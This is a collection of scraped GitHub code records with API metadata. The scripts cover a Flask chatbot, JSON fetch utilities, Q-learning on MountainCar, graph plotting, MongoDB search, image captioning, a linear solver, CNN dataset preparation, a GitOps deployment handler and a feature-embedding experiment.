= session_client.session_path(project_id, session_id)\n\t\n\tif text:\n\t\ttext_input = dialogflow.types.TextInput(\n\t\t\ttext=text, language_code=language_code)\n\t\tquery_input = dialogflow.types.QueryInput(text=text_input)\n\t\tresponse = session_client.detect_intent(\n\t\t\tsession=session, query_input=query_input)\n\n\t\treturn response.query_result.fulfillment_text\n\n\n@app.route('/send_message', methods=['POST'])\ndef send_message():\n\tmessage = request.form['message']\n\tproject_id = os.getenv('DIALOGFLOW_PROJECT_ID')\n\tfulfillment_text = detect_intent_texts(project_id, \"unique\", message, 'en')\n\tresponse_text = {\"message\": fulfillment_text}\n\t# socketId = request.form['socketId']\n\t# pusher_client.trigger('movie_bot', 'new_message',\n\t# \t{'human_message': message, 'bot_message': fulfillment_text},\n\t# \tsocketId)\n\n\treturn jsonify(response_text)\n\n\nif __name__ == '__main__':\n\tapp.run()\n", "repo_name": "Alexmhack/flask_chatbot", "sub_path": "index.py", "file_name": "index.py", "file_ext": "py", "file_size_in_byte": 2102, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "31", "api": [{"api_name": "dotenv.load_dotenv", "line_number": 10, "usage_type": "call"}, {"api_name": "dotenv.find_dotenv", "line_number": 10, "usage_type": "call"}, {"api_name": "pusher.Pusher", "line_number": 13, "usage_type": "call"}, {"api_name": "os.getenv", "line_number": 14, "usage_type": "call"}, {"api_name": "os.getenv", "line_number": 15, "usage_type": "call"}, {"api_name": "os.getenv", "line_number": 16, "usage_type": "call"}, {"api_name": "os.getenv", "line_number": 17, "usage_type": "call"}, {"api_name": "flask.Flask", "line_number": 20, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 24, "usage_type": "call"}, {"api_name": "flask.request.get_json", "line_number": 29, "usage_type": "call"}, {"api_name": "flask.request", "line_number": 29, "usage_type": "name"}, {"api_name": "os.getenv", "line_number": 31, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 33, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 34, "usage_type": "call"}, 
{"api_name": "flask.jsonify", "line_number": 46, "usage_type": "call"}, {"api_name": "dialogflow.SessionsClient", "line_number": 50, "usage_type": "call"}, {"api_name": "dialogflow.types.TextInput", "line_number": 54, "usage_type": "call"}, {"api_name": "dialogflow.types", "line_number": 54, "usage_type": "attribute"}, {"api_name": "dialogflow.types.QueryInput", "line_number": 56, "usage_type": "call"}, {"api_name": "dialogflow.types", "line_number": 56, "usage_type": "attribute"}, {"api_name": "flask.request.form", "line_number": 65, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 65, "usage_type": "name"}, {"api_name": "os.getenv", "line_number": 66, "usage_type": "call"}, {"api_name": "flask.jsonify", "line_number": 74, "usage_type": "call"}]}
+{"seq_id": "10949957799", "text": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# Created by wind on 2021/4/21\n\nimport requests\nimport json\nimport time\n\n\nclass Utils:\n '''\n @staticmethod\n def fetchJsonToList(url, root, subitem):\n\n response = requests.get(url)\n\n try:\n json_items = json.loads(response.text)\n return json_items[root][subitem]\n\n except Exception,ex:\n items = []\n\n return items\n '''\n\n @staticmethod\n def fetchJsonToListItems(url, root, subitem):\n response = requests.get(url)\n try:\n json_items = json.loads(response.text)\n return json_items[root][subitem]\n except Exception as ex:\n items = []\n return items\n\n @staticmethod\n def fetchJsonItems(url, root, subitem):\n response = requests.get(url)\n try:\n json_items = json.loads(response.text)\n items = json_items[root][subitem]\n except Exception as ex:\n items = []\n return items\n\n @staticmethod\n def fetchJsonKvItems(url, root):\n response = requests.get(url)\n try:\n json_items = json.loads(response.text)\n items = json_items[root]\n except Exception as ex:\n items = {}\n return items\n\n @staticmethod\n def fetchJsonToList(url):\n response = requests.get(url)\n try:\n json_items = json.loads(response.text)\n items = json_items\n except Exception as ex:\n items = []\n return items\n\n @staticmethod\n def fetchRMJsonKvItems(url, root, key, value):\n result = {}\n response = requests.get(url)\n text = json.loads(response.text)\n items = text[root]\n for item in items:\n if (item.has_key(\"modelerType\")):\n if (item[\"modelerType\"].find(\"user\") != -1): continue\n if item.has_key(key) and item.has_key(value):\n result[item[key]] = item[value]\n return result\n\n @staticmethod\n def fetchJsonKvsItems(url, root, key, value):\n result = {}\n response = requests.get(url)\n text = json.loads(response.text)\n items = text[root]\n for item in items:\n if (item.has_key(\"modelerType\")):\n if (item[\"modelerType\"].find(\"user\") != -1): continue\n if item.has_key(key):\n result[item[key]] = [item[i] for i in value.split(\",\")]\n return result\n\n @staticmethod\n def timeToDatetime(timestamp):\n t = time.localtime(timestamp)\n return time.strftime('%Y-%m-%d %H:%M:%S', t)\n\n @staticmethod\n def currentTimeToDatetime():\n t = time.localtime(time.time())\n return time.strftime('%Y-%m-%d %H:%M:%S', t)\n\n @staticmethod\n def getOrDefault(map, key, default):\n if map.has_key(key): return map[key]\n return default\n\n @staticmethod\n def getOrDefaultByList(list, key, value, default):\n for item in list:\n if item[key] == value: return item\n return default\n", "repo_name": "windgeek/bigdata_cus", "sub_path": "yarn_list_utils/Utils.py", "file_name": "Utils.py", "file_ext": "py", "file_size_in_byte": 3042, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "requests.get", "line_number": 29, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 31, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 39, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 41, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 49, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 51, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 59, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 61, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 70, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 71, "usage_type": 
"call"}, {"api_name": "requests.get", "line_number": 83, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 84, "usage_type": "call"}, {"api_name": "time.localtime", "line_number": 95, "usage_type": "call"}, {"api_name": "time.strftime", "line_number": 96, "usage_type": "call"}, {"api_name": "time.localtime", "line_number": 100, "usage_type": "call"}, {"api_name": "time.time", "line_number": 100, "usage_type": "call"}, {"api_name": "time.strftime", "line_number": 101, "usage_type": "call"}]}
+{"seq_id": "4020028220", "text": "import gym, math, random\nimport numpy as np\n#env = gym.make('CartPole-v0')\nenv = gym.make('MountainCar-v0')\n#env = gym.make('Hopper-v1')\n#env = gym.make('MsPacman-v0')\n\n\nA_DIVS=100\nB_DIVS=100\n\n\naRange = ( -2, 2 ) #\nbRange = ( -.1, .1 ) #\n\n\nbrain = np.zeros( (A_DIVS,B_DIVS, 3) )\n#brain += 4.5\n\nobs = env.reset()\n\nLEFT = 0\nNOTHING = 1\nRIGHT = 2\n\ndiscount = .99999\n\nrunning_average_value = 0\n\ndef obs_to_index( _obs ):\n result = [ int((_obs[0]-aRange[0])/(aRange[1]-aRange[0])*A_DIVS + .5 ),\n int((_obs[1]-bRange[0])/(bRange[1]-bRange[0])*B_DIVS + .5 ),]\n\n result[0] = max(0,min(A_DIVS-1,result[0]))\n result[1] = max(0,min(B_DIVS-1,result[1]))\n\n\n return result\n\nsteps_till_crash = 0\nrun_number = 0\n\n\ncount_out = 0\n\nwhile True:\n\n \n epsilon = 1.0/((run_number+1)/1)\n\n indexes = obs_to_index( obs )\n\n left_value = brain[ indexes[0], indexes[1], LEFT ]\n no_value = brain[ indexes[0], indexes[1], NOTHING ]\n right_value = brain[ indexes[0], indexes[1], RIGHT ]\n\n\n if random.random() > epsilon:\n best_value = left_value\n picked_direction = LEFT\n if no_value > best_value:\n picked_direction = NOTHING\n best_value = no_value\n if right_value > best_value:\n picked_direction = RIGHT\n best_value = right_value\n\n else:\n picked_direction = random.choice( [LEFT,NOTHING,RIGHT])\n\n #if picked_direction == LEFT:\n # print( \"vl:\" + str(left_value), end=' ' )\n # else:\n # print( \"vr:\" + str(right_value), end=' ' )\n\n results = env.step(picked_direction)\n\n obs = results[0]\n reward = results[1]\n done = results[2]\n\n new_index = obs_to_index( obs )\n\n thing = max(max( brain[ new_index[0], new_index[1], LEFT], brain[new_index[0], new_index[1], RIGHT] ), brain[new_index[0], new_index[1], NOTHING])\n \n if done:\n target_value = reward\n #target_value = -.5 #-5\n \n\n #alpha = .99\n #running_average_value = alpha*running_average_value + (1-alpha)*steps_till_crash\n\n #print( \"epsilon at : \" + str( epsilon ) + \" r\" + str(run_number) + \" stepped \" + str(steps_till_crash) + \" till crash or \" + str( running_average_value ) )\n #steps_till_crash = 0\n else:\n target_value = thing*discount + reward\n #steps_till_crash += 1\n\n\n existing_value = brain[ indexes[0], indexes[1], picked_direction ]\n\n brain[ indexes[0], indexes[1], picked_direction ] = existing_value * .9 + target_value * .1\n #print( \"changing from \" + str( existing_value ) + \" closer to \" + str( target_value ) + \" indexing at \" + str( indexes[0] ) + \", \" + str( indexes[1] ) )\n\n #if existing_value * .9 + target_value * .1 > 1:\n # print( \"ahahahah\" )\n\n #steps_final = steps_till_crash_array[-1]\n\n if run_number % 2000 == 0:\n #if steps_final == steps_till_crash_max:\n env.render()\n\n \n if done:\n env.reset()\n run_number += 1\n print( \"now on run \" + str( run_number ) )\n\n #env.render()\n \n \n\n \n\n \n", "repo_name": "Chadleewalker/AI", "sub_path": "Mountain Car.py", "file_name": "Mountain Car.py", "file_ext": "py", "file_size_in_byte": 3045, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "gym.make", "line_number": 4, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 17, "usage_type": "call"}, {"api_name": "random.random", "line_number": 58, "usage_type": "call"}, {"api_name": "random.choice", "line_number": 69, "usage_type": "call"}]}
+{"seq_id": "26619492853", "text": "\"\"\" Plots the workflow's graph\n\"\"\"\nimport os\nfrom graphviz import Digraph\n\nEXPLORE_URL = os.getenv('EXPLORE_URL', \"https://dev-www.materialscloud.org/explore/curated-cofs\")\n\n\ndef get_aiida_link(mat_dict, extra_tag):\n return \"{}/details/{}\".format(EXPLORE_URL, mat_dict[extra_tag].uuid)\n\n\ndef get_graph(mat_dict):\n \"\"\"Sketch a graph of the CO2 capture workflow (appl_pecoal).\n NOTE: dropped link to ProcessNodes because they are different depending from the workflow version, are not included \n in groups, ansd would be difficult to maintain.\n \"\"\"\n\n link_paper = \"https://doi.org/\" + mat_dict['doi_ref']\n link_github = \"https://github.com/danieleongari/CURATED-COFs/blob/master/cifs/{}.cif\".format(mat_dict['mat_id'])\n\n g = Digraph(\"Workflow's graph\")\n\n g.attr(rankdir='TB')\n g.attr(\"node\", style='filled', fillcolor='white:gray', gradientangle='45')\n\n g.node(\"Reference\\npublication\", shape=\"oval\", href=link_paper)\n g.node(\"GitHub\", shape=\"oval\", href=link_github)\n g.node(\"Original\\nstructure\", shape=\"oval\", href=get_aiida_link(mat_dict, \"orig_cif\"))\n g.node(\"geo1\", label=\"Geometric\\nproperties\", shape=\"oval\", href=get_aiida_link(mat_dict, \"orig_zeopp\"))\n g.node(\"DFT optimization\", shape=\"box\")\n g.node(\"DFT output details\", shape=\"oval\", href=get_aiida_link(mat_dict, \"dftopt\"))\n g.node(\"DDEC charges evaluation\", shape=\"box\")\n g.node(\"Optimized structure\\n W/DDEC charges\", shape=\"oval\", href=get_aiida_link(mat_dict, \"opt_cif_ddec\"))\n g.node(\"geo2\", label=\"Geometric\\nproperties\", shape=\"oval\", href=get_aiida_link(mat_dict, \"opt_zeopp\"))\n g.node(\"Adsorption calculation\\nCO2\", shape=\"box\")\n g.node(\"Adsorption calculation\\nN2\", shape=\"box\")\n g.node(\"Results CO2\", shape=\"oval\", href=get_aiida_link(mat_dict, \"isot_co2\"))\n g.node(\"Results N2\", shape=\"oval\", href=get_aiida_link(mat_dict, \"isot_n2\"))\n g.node(\"CCS process\\nperformances\", shape=\"oval\", href=get_aiida_link(mat_dict, \"appl_pecoal\"))\n\n g.edge(\"Reference\\npublication\", 'GitHub')\n g.edge('GitHub', 'Original\\nstructure')\n g.edge('Original\\nstructure', \"geo1\")\n g.edge('Original\\nstructure', \"DFT optimization\")\n g.edge(\"DFT optimization\", \"DDEC charges evaluation\")\n g.edge(\"DFT optimization\", \"DFT output details\")\n g.edge(\"DDEC charges evaluation\", \"Optimized structure\\n W/DDEC charges\")\n g.edge(\"Optimized structure\\n W/DDEC charges\", \"geo2\")\n g.edge(\"Optimized structure\\n W/DDEC charges\", \"Adsorption calculation\\nCO2\")\n g.edge(\"Optimized structure\\n W/DDEC charges\", \"Adsorption calculation\\nN2\")\n g.edge(\"Adsorption calculation\\nCO2\", \"Results CO2\")\n g.edge(\"Adsorption calculation\\nN2\", \"Results N2\")\n g.edge(\"Results CO2\", \"CCS process\\nperformances\")\n g.edge(\"Results N2\", \"CCS process\\nperformances\")\n return g\n", "repo_name": "materialscloud-org/discover-curated-cofs", "sub_path": "detail/graph.py", "file_name": "graph.py", "file_ext": "py", "file_size_in_byte": 2811, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "31", "api": [{"api_name": "os.getenv", "line_number": 6, "usage_type": "call"}, {"api_name": "graphviz.Digraph", "line_number": 22, "usage_type": "call"}]}
+{"seq_id": "20409054800", "text": "from pymongo import MongoClient\n\n\ndef find_bid_in_range(host, port, udb, ucollection, gte, lte):\n connection = MongoClient(host, port)\n db = connection[udb]\n collection = db[ucollection]\n\n # cursor finds the bids within the given range. This is then converted to a Python list object\n # so that it can be printed below.\n cursor = collection.find({\"AuctionFeeTotal\": {\"$gte\": gte, \"$lte\" : lte}})\n results = list(cursor)\n\n # Validates that there are bids to be printed.\n if results is None:\n print(\"No bids found...\")\n return None\n\n # Print column titles\n field_list = [\"AuctionID\", \"AuctionTitle\", \"Fund\", \"AuctionFeeTotal\"]\n\n print(\"{0} | {1} | {2} | {3}\".format(field_list[0], field_list[1], field_list[2], field_list[3]))\n\n for i in results:\n listed_values = []\n for j in i:\n listed_values.append(i[j])\n print(\"{0} | {1} | {2} | {3}\".format(listed_values[2], listed_values[1], listed_values[3], listed_values[9]))\n\n return None\n\n\n# check_values abstracts the code for finding bids in the given range. The functions and logic below\n# validate the user input.\ndef check_values():\n loop_condition = True\n print(\"Find bids between a lesser and greater value Auction Fee Total\")\n while loop_condition:\n try:\n lesser = int(input(\"Enter the lesser value: \"))\n greater = int(input(\"Enter the greater value: \"))\n except:\n print(\"Enter a valid input...\")\n if lesser > greater:\n print(\"The lower value is greater than the higher value. Please enter valid inputs...\")\n else:\n find_bid_in_range('localhost', 27017, 'CityData', 'bids', lesser, greater)\n loop_condition = False\n\n", "repo_name": "JamesCourcelle/FinalProject", "sub_path": "MongoFiles/search_functions.py", "file_name": "search_functions.py", "file_ext": "py", "file_size_in_byte": 1758, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "pymongo.MongoClient", "line_number": 5, "usage_type": "call"}]}
+{"seq_id": "25352153151", "text": "from PIL import Image\nfrom PIL import ImageFont\nfrom PIL import ImageDraw\n\n\ndef create_image(typeofw, name, fi, group, chron):\n img = Image.open(\"input.jpg\")\n typeofw = typeofw.strip()\n name = name.strip()\n fi = fi.strip()\n group = group.strip()\n chron = chron.strip()\n\n group_number = group[2::]\n group = group[:2:]\n\n draw = ImageDraw.Draw(img)\n\n font = ImageFont.truetype(\"verdana.ttf\", 30)\n font_bold = ImageFont.truetype(\"verdana_bold.ttf\", 30)\n\n draw.text((630 - (len(typeofw) // 2 * 17), 255), typeofw, (255, 255, 255), font=font)\n\n draw.text((630 - (len(name) // 2 * 17), 360), name, (255, 255, 255), font=font)\n\n draw.text((630 - (len(fi) // 2 * 17), 481), fi, (255, 255, 255), font=font)\n\n draw.text((405, 595), group, (255, 255, 255), font=font)\n draw.text((445, 595), group_number, (255, 255, 255), font=font_bold)\n\n draw.text((875, 595), chron, (255, 255, 255), font=font_bold)\n result = img.save(\"result.jpg\")\n\n\ndef formating(text):\n l = \"\"\n for i in range(len(text) - 1):\n if text[i] + text[i + 1] == \", \":\n l = l + \",\"\n else:\n l = l + text[i]\n text = l + text[-1]\n return text\n\n\ndef check(text):\n n = 4\n for i in text:\n if i == \",\":\n n = n - 1\n return n == 0\n", "repo_name": "Smarandii/text_to_clapperboard_image_bot", "sub_path": "process.py", "file_name": "process.py", "file_ext": "py", "file_size_in_byte": 1303, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 4, "dataset": "github-code", "pt": "31", "api": [{"api_name": "PIL.Image.open", "line_number": 7, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 7, "usage_type": "name"}, {"api_name": "PIL.ImageDraw.Draw", "line_number": 17, "usage_type": "call"}, {"api_name": "PIL.ImageDraw", "line_number": 17, "usage_type": "name"}, {"api_name": "PIL.ImageFont.truetype", "line_number": 19, "usage_type": "call"}, {"api_name": "PIL.ImageFont", "line_number": 19, "usage_type": "name"}, {"api_name": "PIL.ImageFont.truetype", "line_number": 20, "usage_type": "call"}, {"api_name": "PIL.ImageFont", "line_number": 20, "usage_type": "name"}]}
+{"seq_id": "32532153287", "text": "import numpy as np\nfrom scipy.fft import fft\n\nfrom task import DECIMAL_PLACES\n\n\ndef checkAccuracy(x, x1):\n eps = 10**-DECIMAL_PLACES\n for i in range(x.shape[0]):\n if (abs(x[i] - x1[i]) > eps):\n return False\n \n return True\n\n\n\n\ndef calrResultRelaxMethod(matrix, vector, w):\n \n x = np.zeros(matrix.shape[0])\n step = 1\n while(True):\n x1 = np.zeros(matrix.shape[0])\n x0 = x.copy()\n for i in range(matrix.shape[0]):\n x1[i] = (vector[i] - sum(matrix[i][j]*x[j] for j in range(matrix.shape[0])) + matrix[i][i]*x[i])/matrix[i][i]\n x[i] = w*x1[i] + (1 - w)*x0[i]\n print(str(step) + \" step: \" + str(x1))\n step += 1\n if(checkAccuracy(x1, x0)):\n x = x1.copy()\n break\n x = x1.copy()\n\n return x\n\ndef relax(matrix, vector):\n\n x = calrResultRelaxMethod(matrix, vector, w = 1.25)\n return x", "repo_name": "Vypsen/vichmat", "sub_path": "methods/relax.py", "file_name": "relax.py", "file_ext": "py", "file_size_in_byte": 923, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "task.DECIMAL_PLACES", "line_number": 8, "usage_type": "name"}, {"api_name": "numpy.zeros", "line_number": 20, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 23, "usage_type": "call"}]}
+{"seq_id": "42949786145", "text": "\"\"\"\ni have many samples and i have a cnn that can detect patterns in images\nso i can prepare much bigger dataset from some source and run cnn through\nevery square that is not pattern i can add to bad class\nevere square without continuation by other square is also in bad class\nall other could be recommended to good class\nquestion: how to find out that square without continuation?\nanswer:\nAfter merging all rects, squares which sizes are 32x32 will stand alone they are in bad class\n\nNow we try to create concept for needed functions\nwe need to solve several problems\nwe must prepare new dataset\nwe must run through it with cnn\nwe must prepare three classes which are bad class without patterns,\nbad class with pattern but without continuation and\ngood class with both pattern and continuation\n\nwe now how to marge rects, we have complete class for it\nwe now how to check if square without continuation\n\nAll of that gives as an algorithm\n\n1) prepare bigger dataset (probably, several millions samples)\n2) decompose it by frames\n3) for each frame find it cwt and run cnn on it\n4) find all rects and merge them if it is needed\n5) each square that is not a pattern we can add to a first class\n6) each rect that is only 32x32 we can add to a second class\n7) each rect that is not 32x32 we can add to a good class\n\n\"\"\"\n\n\nimport random\nimport numpy as np\nimport pandas as pd\n\n# Keras Imports - CNN\nfrom keras.models import model_from_json\n\n# My scripts import\nfrom scripts.extremumlib import *\nfrom scripts.Segmentation import *\nfrom scripts.Rect import *\n\nimport time\nimport datetime\nimport json\n\n\n# load json and create\n\nmodel_json_path = '../../KerasCNN/models/model1.json' #model_nclasses_46_1\nmodel_h5_path = '../../KerasCNN/models/model1.h5'\njson_file = open(model_json_path, 'r')\nloaded_model_json = json_file.read()\njson_file.close()\ncnn = model_from_json(loaded_model_json)\n# load weights into new model\ncnn.load_weights(model_h5_path)\nprint(\"Loaded model from disk\")\n\n\nopt = 'adam'\nloss = 'categorical_crossentropy'\nmetrics = ['accuracy']\n# Compile the classifier using the configuration we want\ncnn.compile(optimizer=opt, loss=loss, metrics=metrics)\n\nwith open('temp.txt', 'r') as f:\n lines = list(f)\n price_series = [float(x) for x in lines[0][1:-2].split(',')]\n # print(line)\n n = len(price_series)\n # print(price_series)\n\nimages = []\n\nwindow_size = 256\n\nintervals = []\n\nbad_first_class = []\nbad_second_class = []\ngood_class = []\n\nfor b in range(0, len(price_series), 256):\n\n scale = 50\n\n x = np.arange(1, window_size + 1)\n y = np.arange(1, scale)\n\n X, Y = np.meshgrid(x, y)\n\n window = price_series[n - window_size - b: n - b]\n window = np.array(window)\n\n M = get_cwt_swt(window, scale=scale, mask=[1, 1, 1, 1, 1, 0, 0, 0, 0, 0])\n M = linear(M)\n # M = bound_filter(M, alpha=0.5)\n\n block_sizex = 32\n block_sizey = 32\n\n test = []\n coords = []\n\n for i in range(scale - block_sizex):\n for j in range(window_size - block_sizey):\n test.append(M[i:i + block_sizex, j:j + block_sizey])\n coords.append((i, j))\n\n test = np.array(test)\n test = test.reshape(test.shape[0], block_sizex, block_sizey, 1)\n result = cnn.predict(test, verbose=1)\n\n cnt = 0\n wow = []\n wow_coords = []\n\n for i in range(len(result)):\n if result[i, 1] > 0.80:\n cnt+=1\n wow.append(test[i, :, :, 0])\n wow_coords.append(coords[i])\n else:\n bad_first_class.append(test[i, :, :, 0])\n\n segmentations = []\n\n 
wow_rects = [Rect(wow_coords[i], 32, 32) for i in range(cnt)]\n\n wow_rects = sorted(wow_rects, key=lambda a: a.x[1])\n\n correct_rects = []\n\n for rect in wow_rects:\n if len(correct_rects) == 0:\n correct_rects.append(rect)\n elif not correct_rects[-1].is_crossing(rect):\n correct_rects.append(rect)\n else:\n correct_rects[-1] = correct_rects[-1].get_convex_rect(rect)\n\n for x in correct_rects:\n if x.h == x.w == 32:\n bad_second_class.append(M[x.x[0]: x.x[0] + x.h, x.x[1]: x.x[1] + x.w])\n else:\n good_class.append(M[x.x[0]: x.x[0] + 32, x.x[1]: x.x[1] + 32])\n\n wow = [M[x.x[0]: x.x[0] + x.h, x.x[1]: x.x[1] + x.w] for x in correct_rects]\n\n\ndata = []\nfor x in bad_first_class[:1000]:\n data.append((x, 0))\n\nfor x in bad_second_class:\n data.append((x, 1))\n\nfor x in good_class:\n data.append((x, 2))\n\n\ndef prepare_data(data):\n new_data = []\n for x, y in data:\n x = np.array(list(x.reshape((1, -1))[0, :]) + [y])\n # print(len(x))\n new_data.append(x)\n return pd.DataFrame(data=new_data)\n\n# size = len(data)\n# for i in range(size):\n# data.append((-data[i][0], data[i][1]))\n\nprint(len(data), len(bad_first_class), len(bad_second_class), len(good_class))\ndata = prepare_data(data)\ndata.to_csv('../../KerasCNN/input/data_cwt.csv', sep=',', header=None, index=None)\n\n\n\n", "repo_name": "CyberSoftStudio/TSForecasting", "sub_path": "scripts/training_data_preparation.py", "file_name": "training_data_preparation.py", "file_ext": "py", "file_size_in_byte": 4943, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "keras.models.model_from_json", "line_number": 59, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 92, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 93, "usage_type": "call"}, {"api_name": "numpy.meshgrid", "line_number": 95, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 98, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 115, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 170, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 173, "usage_type": "call"}]}
+{"seq_id": "28686171433", "text": "import os\nimport json\nfrom datetime import datetime\n\nclass Deployment():\n base_path = \"\"\n base_name = \"\"\n subfiles = []\n config = {}\n def set_base_name(self, name):\n self.base_name = name\n \n def deploy(self):\n print(f\"Processing {self.base_name}\")\n self.mark_completed()\n\n def delete(self):\n print(f\"Deleting {self.base_name}\")\n for file in self.subfiles:\n os.remove(os.path.join(self.base_path, file))\n os.rmdir(self.base_path)\n\n \n def mark_completed(self):\n with open(os.path.join(self.base_path,\"completed.keep\") , \"w\") as fp:\n fp.write(self.base_name+\"\\n\")\n fp.write(str(datetime.now()))\n\n def mark_failed(self):\n with open(os.path.join(self.base_path,\"failed.keep\") , \"w\") as fp:\n fp.write(self.base_name+\"\\n\")\n fp.write(str(datetime.now()))\n\ndef mark_changed():\n with open(os.path.join(\"changed.nokeep\") , \"w\") as fp:\n fp.write(\"\\n\")\n fp.write(str(datetime.now()))\n\ndef read_json(path: str) -> dict:\n with open(path, \"r\") as fp:\n data = json.load(fp)\n return data\n\ndef get_deployments(root_dir):\n deployments = []\n deletions = []\n for root, dirs, files in os.walk(root_dir):\n print(\"Found deployments: \",dirs, \" on \", root_dir, files)\n for dir in dirs:\n print(\"Parsing Directory: \" + os.path.join(root, dir))\n d_ = Deployment()\n d_.base_path = os.path.join(root, dir)\n d_.set_base_name(os.path.basename(dir))\n subfiles = os.listdir(d_.base_path)\n subfiles = [f for f in subfiles if os.path.isfile(os.path.join(d_.base_path, f))] #Filtering only the files.\n d_.subfiles = subfiles\n if \"delete.keep\" in subfiles:\n deletions.append(d_)\n continue\n if \"completed.keep\" in subfiles:\n continue # Directory allready processed so skip \n if \"config.json\" in subfiles:\n d_.config = read_json(os.path.join(d_.base_path, \"config.json\"))\n deployments.append(d_)\n break\n\n return deployments,deletions\n\ndef process_deployment_creation(deploy_list: list[Deployment]) -> None:\n for d in deploy_list:\n print(f\"Deploying {d.base_name}\")\n d.deploy()\n mark_changed()\n\ndef process_deployment_deletion(deploy_list: list[Deployment]) -> None:\n for d in deploy_list:\n print(f\"Deleting {d.base_name}\")\n d.delete()\n mark_changed()\n\nif __name__ == \"__main__\":\n d_list = get_deployments(\"deployments\")\n process_deployment_creation(d_list[0])\n process_deployment_deletion(d_list[1])", "repo_name": "jptalukdar/GitOps-Workflows", "sub_path": "src/invoke.py", "file_name": "invoke.py", "file_ext": "py", "file_size_in_byte": 2452, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "os.remove", "line_number": 20, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 20, "usage_type": "call"}, {"api_name": "os.path", "line_number": 20, "usage_type": "attribute"}, {"api_name": "os.rmdir", "line_number": 21, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 25, "usage_type": "call"}, {"api_name": "os.path", "line_number": 25, "usage_type": "attribute"}, {"api_name": "datetime.datetime.now", "line_number": 27, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 27, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 30, "usage_type": "call"}, {"api_name": "os.path", "line_number": 30, "usage_type": "attribute"}, {"api_name": "datetime.datetime.now", "line_number": 32, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 32, 
"usage_type": "name"}, {"api_name": "os.path.join", "line_number": 35, "usage_type": "call"}, {"api_name": "os.path", "line_number": 35, "usage_type": "attribute"}, {"api_name": "datetime.datetime.now", "line_number": 37, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 37, "usage_type": "name"}, {"api_name": "json.load", "line_number": 41, "usage_type": "call"}, {"api_name": "os.walk", "line_number": 47, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 50, "usage_type": "call"}, {"api_name": "os.path", "line_number": 50, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 52, "usage_type": "call"}, {"api_name": "os.path", "line_number": 52, "usage_type": "attribute"}, {"api_name": "os.path.basename", "line_number": 53, "usage_type": "call"}, {"api_name": "os.path", "line_number": 53, "usage_type": "attribute"}, {"api_name": "os.listdir", "line_number": 54, "usage_type": "call"}, {"api_name": "os.path.isfile", "line_number": 55, "usage_type": "call"}, {"api_name": "os.path", "line_number": 55, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 55, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 63, "usage_type": "call"}, {"api_name": "os.path", "line_number": 63, "usage_type": "attribute"}]}
+{"seq_id": "14312078336", "text": "import numpy as np\nimport scipy.io as sio\nimport time\nfrom FeatWalk import featurewalk\n\n'''################# Load data #################'''\nmat_contents = sio.loadmat('ACM.mat')\nnumber_walks = 35 # 'Number of random walks to start at each instance'\nwalk_length = 25 # 'Length of the random walk started at each instance'\nwin_size = 5 # 'Window size of skipgram model.'\n\n'''################# Experimental Settings #################'''\nd = 100 # the dimension of the embedding representation\nX1 = mat_contents[\"Features\"]\nX2 = mat_contents[\"Network\"]\nLabel = mat_contents[\"Label\"]\ndel mat_contents\nn = X1.shape[0]\nIndices = np.random.randint(25, size=n)+1 # 5-fold cross-validation indices\n\nGroup1 = []\nGroup2 = []\n[Group1.append(x) for x in range(0, n) if Indices[x] <= 5] # 2 for 10%, 5 for 25%, 20 for 100% of training group\n[Group2.append(x) for x in range(0, n) if Indices[x] >= 21] # test group\nn1 = len(Group1) # num of instances in training group\nn2 = len(Group2) # num of instances in test group\nCombX1 = X1[Group1+Group2, :]\nCombX2 = X2[Group1+Group2, :][:, Group1+Group2]\n\n\n'''################# Large-Scale Heterogeneous Feature Embedding #################'''\nprint(\"Large-Scale Heterogeneous Feature Embedding (FeatWalk), 5-fold with 25% of training is used:\")\nprint(\"Estimated running time {} seconds\".format((n1+n2)*0.014))\nstart_time = time.time()\nH_FeatWalk = featurewalk(featur1=CombX1, alpha1=.97, featur2=None, 